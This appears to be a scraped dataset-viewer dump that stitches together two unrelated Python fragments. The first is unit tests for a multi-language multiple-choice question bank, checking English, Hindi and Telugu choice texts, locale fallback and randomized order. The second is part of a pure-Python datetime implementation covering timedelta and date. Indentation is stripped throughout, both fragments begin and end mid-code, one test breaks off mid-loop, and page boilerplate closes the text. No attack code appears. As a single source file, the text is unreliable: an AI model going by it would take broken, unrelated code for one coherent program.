self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
form = self._bank.get_question_form_for_update(question.ident)
form.clear_choice_texts(choice_identifier)
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
1
)
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': '',
'name': ''
}]
)
def test_can_clear_choices(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._hindi(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
1
)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
3
)
self.assertEqual(
item._my_map['question']['choices'][0]['id'],
choice_identifier
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
form = self._bank.get_question_form_for_update(question.ident)
form.clear_choices()
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
0
)
self.assertEqual(
item.get_question().get_choices(),
[]
)
def test_can_remove_a_choice_text_by_language(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._hindi(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
1
)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
3
)
self.assertEqual(
item._my_map['question']['choices'][0]['id'],
choice_identifier
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
form = self._bank.get_question_form_for_update(question.ident)
form.remove_choice_language(self._english().language_type, choice_identifier)
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
2
)
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._hindi_text,
'name': ''
}]
)
def test_can_replace_a_choice_text(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._hindi(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
question = self._bank.create_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices']),
1
)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
3
)
self.assertEqual(
item._my_map['question']['choices'][0]['id'],
choice_identifier
)
self.assertIn(self._str_txt(self._english()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
new_english_feedback = DisplayText(display_text_map={
'text': 'foo',
'languageTypeId': '639-2%3AENG%40ISO',
'scriptTypeId': '15924%3ALATN%40ISO',
'formatTypeId': 'TextFormats%3APLAIN%40okapia.net'
})
form = self._bank.get_question_form_for_update(question.ident)
form.edit_choice(new_english_feedback, choice_identifier)
self._bank.update_question(form)
item = self._bank.get_item(item.ident)
self.assertEqual(
len(item._my_map['question']['choices'][0]['texts']),
3
)
self.assertIn(self._str_txt(self._hindi()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(self._telugu()), item._my_map['question']['choices'][0]['texts'])
self.assertIn(self._str_txt(new_english_feedback), item._my_map['question']['choices'][0]['texts'])
self.assertEqual(
item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': 'foo',
'name': ''
}]
)
def test_setting_proxy_locale_gets_choice_text_in_specified_language(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._hindi(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
self._bank.create_question(form)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._hindi_text,
'name': ''
}]
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._telugu_text,
'name': ''
}]
)
def test_english_default_choice_text_if_locale_code_not_available(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._english(), identifier=choice_identifier)
form.add_choice(self._telugu(), identifier=choice_identifier)
self._bank.create_question(form)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._english_text,
'name': ''
}]
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._telugu_text,
'name': ''
}]
)
def test_first_available_choice_text_if_locale_code_and_english_not_available(self):
form = self._bank.get_item_form_for_create([])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
choice_identifier = 'foobar'
form.add_choice(self._telugu(), identifier=choice_identifier)
self._bank.create_question(form)
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
self.assertEqual(
hi_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._telugu_text,
'name': ''
}]
)
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
self.assertEqual(
en_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._telugu_text,
'name': ''
}]
)
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
self.assertEqual(
te_item.get_question().get_choices(),
[{
'id': choice_identifier,
'text': self._telugu_text,
'name': ''
}]
)
def test_multi_language_plays_well_with_randomized_order(self):
form = self._bank.get_item_form_for_create([MC_RANDOMIZED_ITEM_RECORD])
form.display_name = 'testing for question text'
item = self._bank.create_item(form)
form = self._bank.get_question_form_for_create(item.ident, [MC_RANDOMIZED_RECORD,
MULTI_LANGUAGE_MULTIPLE_CHOICE_QUESTION_RECORD])
form.add_choice(self._english(), identifier='1')
form.add_choice(self._hindi(), identifier='1')
form.add_choice(self._telugu(), identifier='1')
form.add_choice(self._english(), identifier='2')
form.add_choice(self._hindi(), identifier='2')
form.add_choice(self._telugu(), identifier='2')
form.add_choice(self._english(), identifier='3')
form.add_choice(self._hindi(), identifier='3')
form.add_choice(self._telugu(), identifier='3')
self._bank.create_question(form)
different_hindi_order = 0
hi_bank = self.get_bank_with_proxy_set_to_locale('HIN')
hi_item = hi_bank.get_item(item.ident)
for i in range(0, 10):
choices = hi_item.get_question().get_choices()
choice_order = [c['id'] for c in choices]
choice_texts = [c['text'] for c in choices]
if choice_order != ['1', '2', '3']:
different_hindi_order += 1
self.assertEqual(
choice_texts,
[self._hindi_text, self._hindi_text, self._hindi_text]
)
self.assertTrue(different_hindi_order > 0)
different_english_order = 0
en_bank = self.get_bank_with_proxy_set_to_locale('ENG')
en_item = en_bank.get_item(item.ident)
for i in range(0, 10):
choices = en_item.get_question().get_choices()
choice_order = [c['id'] for c in choices]
choice_texts = [c['text'] for c in choices]
if choice_order != ['1', '2', '3']:
different_english_order += 1
self.assertEqual(
choice_texts,
[self._english_text, self._english_text, self._english_text]
)
self.assertTrue(different_english_order > 0)
different_telugu_order = 0
te_bank = self.get_bank_with_proxy_set_to_locale('TEL')
te_item = te_bank.get_item(item.ident)
for i in range(0, 10):
choices = te_item.get_question().get_choices()
| |
microseconds = divmod(microseconds, 1000000)
days, seconds = divmod(seconds, 24*3600)
d += days
s += seconds
microseconds = round(microseconds + usdouble)
assert isinstance(s, int)
assert isinstance(microseconds, int)
assert abs(s) <= 3 * 24 * 3600
assert abs(microseconds) < 3.1e6
# Just a little bit of carrying possible for microseconds and seconds.
seconds, us = divmod(microseconds, 1000000)
s += seconds
days, s = divmod(s, 24*3600)
d += days
assert isinstance(d, int)
assert isinstance(s, int) and 0 <= s < 24*3600
assert isinstance(us, int) and 0 <= us < 1000000
if abs(d) > 999999999:
raise OverflowError("timedelta # of days is too large: %d" % d)
self = object.__new__(cls)
self._days = d
self._seconds = s
self._microseconds = us
self._hashcode = -1
return self
def __repr__(self):
args = []
if self._days:
args.append("days=%d" % self._days)
if self._seconds:
args.append("seconds=%d" % self._seconds)
if self._microseconds:
args.append("microseconds=%d" % self._microseconds)
if not args:
args.append('0')
return "%s.%s(%s)" % (self.__class__.__module__,
self.__class__.__qualname__,
', '.join(args))
def __str__(self):
mm, ss = divmod(self._seconds, 60)
hh, mm = divmod(mm, 60)
s = "%d:%02d:%02d" % (hh, mm, ss)
if self._days:
def plural(n):
return n, abs(n) != 1 and "s" or ""
s = ("%d day%s, " % plural(self._days)) + s
if self._microseconds:
s = s + ".%06d" % self._microseconds
return s
def total_seconds(self):
"""Total seconds in the duration."""
return ((self.days * 86400 + self.seconds) * 10**6 +
self.microseconds) / 10**6
# Read-only field accessors
@property
def days(self):
"""days"""
return self._days
@property
def seconds(self):
"""seconds"""
return self._seconds
@property
def microseconds(self):
"""microseconds"""
return self._microseconds
def __add__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days + other._days,
self._seconds + other._seconds,
self._microseconds + other._microseconds)
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days - other._days,
self._seconds - other._seconds,
self._microseconds - other._microseconds)
return NotImplemented
def __rsub__(self, other):
if isinstance(other, timedelta):
return -self + other
return NotImplemented
def __neg__(self):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(-self._days,
-self._seconds,
-self._microseconds)
def __pos__(self):
return self
def __abs__(self):
if self._days < 0:
return -self
else:
return self
def __mul__(self, other):
if isinstance(other, int):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days * other,
self._seconds * other,
self._microseconds * other)
if isinstance(other, float):
usec = self._to_microseconds()
a, b = other.as_integer_ratio()
return timedelta(0, 0, _divide_and_round(usec * a, b))
return NotImplemented
__rmul__ = __mul__
def _to_microseconds(self):
return ((self._days * (24*3600) + self._seconds) * 1000000 +
self._microseconds)
def __floordiv__(self, other):
if not isinstance(other, (int, timedelta)):
return NotImplemented
usec = self._to_microseconds()
if isinstance(other, timedelta):
return usec // other._to_microseconds()
if isinstance(other, int):
return timedelta(0, 0, usec // other)
def __truediv__(self, other):
if not isinstance(other, (int, float, timedelta)):
return NotImplemented
usec = self._to_microseconds()
if isinstance(other, timedelta):
return usec / other._to_microseconds()
if isinstance(other, int):
return timedelta(0, 0, _divide_and_round(usec, other))
if isinstance(other, float):
a, b = other.as_integer_ratio()
return timedelta(0, 0, _divide_and_round(b * usec, a))
def __mod__(self, other):
if isinstance(other, timedelta):
r = self._to_microseconds() % other._to_microseconds()
return timedelta(0, 0, r)
return NotImplemented
def __divmod__(self, other):
if isinstance(other, timedelta):
q, r = divmod(self._to_microseconds(),
other._to_microseconds())
return q, timedelta(0, 0, r)
return NotImplemented
# Comparisons of timedelta objects with other.
def __eq__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) == 0
else:
return NotImplemented
def __le__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) <= 0
else:
return NotImplemented
def __lt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) < 0
else:
return NotImplemented
def __ge__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) >= 0
else:
return NotImplemented
def __gt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) > 0
else:
return NotImplemented
def _cmp(self, other):
assert isinstance(other, timedelta)
return _cmp(self._getstate(), other._getstate())
def __hash__(self):
if self._hashcode == -1:
self._hashcode = hash(self._getstate())
return self._hashcode
def __bool__(self):
return (self._days != 0 or
self._seconds != 0 or
self._microseconds != 0)
# Pickle support.
def _getstate(self):
return (self._days, self._seconds, self._microseconds)
def __reduce__(self):
return (self.__class__, self._getstate())
timedelta.min = timedelta(-999999999)
timedelta.max = timedelta(days=999999999, hours=23, minutes=59, seconds=59,
microseconds=999999)
timedelta.resolution = timedelta(microseconds=1)
class date:
"""Concrete date type.
Constructors:
__new__()
fromtimestamp()
today()
fromordinal()
Operators:
__repr__, __str__
__eq__, __le__, __lt__, __ge__, __gt__, __hash__
__add__, __radd__, __sub__ (add/radd only with timedelta arg)
Methods:
timetuple()
toordinal()
weekday()
isoweekday(), isocalendar(), isoformat()
ctime()
strftime()
Properties (readonly):
year, month, day
"""
__slots__ = '_year', '_month', '_day', '_hashcode'
def __new__(cls, year, month=None, day=None):
"""Constructor.
Arguments:
year, month, day (required, base 1)
"""
if (month is None and
isinstance(year, (bytes, str)) and len(year) == 4 and
1 <= ord(year[2:3]) <= 12):
# Pickle support
if isinstance(year, str):
try:
year = year.encode('latin1')
except UnicodeEncodeError:
# More informative error message.
raise ValueError(
"Failed to encode latin1 string when unpickling "
"a date object. "
"pickle.load(data, encoding='latin1') is assumed.")
self = object.__new__(cls)
self.__setstate(year)
self._hashcode = -1
return self
year, month, day = _check_date_fields(year, month, day)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
self._hashcode = -1
return self
# Additional constructors
@classmethod
def fromtimestamp(cls, t):
"Construct a date from a POSIX timestamp (like time.time())."
y, m, d, hh, mm, ss, weekday, jday, dst = _time.localtime(t)
return cls(y, m, d)
@classmethod
def today(cls):
"Construct a date from time.time()."
t = _time.time()
return cls.fromtimestamp(t)
@classmethod
def fromordinal(cls, n):
"""Construct a date from a proleptic Gregorian ordinal.
January 1 of year 1 is day 1. Only the year, month and day are
non-zero in the result.
"""
y, m, d = _ord2ymd(n)
return cls(y, m, d)
@classmethod
def fromisoformat(cls, date_string):
"""Construct a date from the output of date.isoformat()."""
if not isinstance(date_string, str):
raise TypeError('fromisoformat: argument must be str')
try:
assert len(date_string) == 10
return cls(*_parse_isoformat_date(date_string))
except Exception:
raise ValueError(f'Invalid isoformat string: {date_string!r}')
@classmethod
def fromisocalendar(cls, year, week, day):
"""Construct a date from the ISO year, week number and weekday.
This is the inverse of the date.isocalendar() function"""
# Year is bounded this way because 9999-12-31 is (9999, 52, 5)
if not MINYEAR <= year <= MAXYEAR:
raise ValueError(f"Year is out of range: {year}")
if not 0 < week < 53:
out_of_range = True
if week == 53:
# ISO years have 53 weeks in them on years starting with a
# Thursday and leap years starting on a Wednesday
first_weekday = _ymd2ord(year, 1, 1) % 7
if (first_weekday == 4 or (first_weekday == 3 and
_is_leap(year))):
out_of_range = False
if out_of_range:
raise ValueError(f"Invalid week: {week}")
if not 0 < day < 8:
raise ValueError(f"Invalid weekday: {day} (range is [1, 7])")
# Now compute the offset from (Y, 1, 1) in days:
day_offset = (week - 1) * 7 + (day - 1)
# Calculate the ordinal day for monday, week 1
day_1 = _isoweek1monday(year)
ord_day = day_1 + day_offset
return cls(*_ord2ymd(ord_day))
# Conversions to string
def __repr__(self):
"""Convert to formal string, for repr().
>>> dt = datetime(2010, 1, 1)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0)'
>>> dt = datetime(2010, 1, 1, tzinfo=timezone.utc)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0, tzinfo=datetime.timezone.utc)'
"""
return "%s.%s(%d, %d, %d)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._year,
self._month,
self._day)
# XXX These shouldn't depend on time.localtime(), because that
# clips the usable dates to [1970 .. 2038). At least ctime() is
# easily done without using strftime() -- that's better too because
# strftime("%c", ...) is locale specific.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d 00:00:00 %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day, self._year)
def strftime(self, fmt):
"Format using strftime()."
return _wrap_strftime(self, fmt, self.timetuple())
def __format__(self, fmt):
if not isinstance(fmt, str):
raise TypeError("must be str, not %s" % type(fmt).__name__)
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
def isoformat(self):
"""Return the date formatted according to ISO.
This is 'YYYY-MM-DD'.
References:
- http://www.w3.org/TR/NOTE-datetime
- http://www.cl.cam.ac.uk/~mgk25/iso-time.html
"""
return "%04d-%02d-%02d" % (self._year, self._month, self._day)
__str__ = isoformat
# Read-only |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.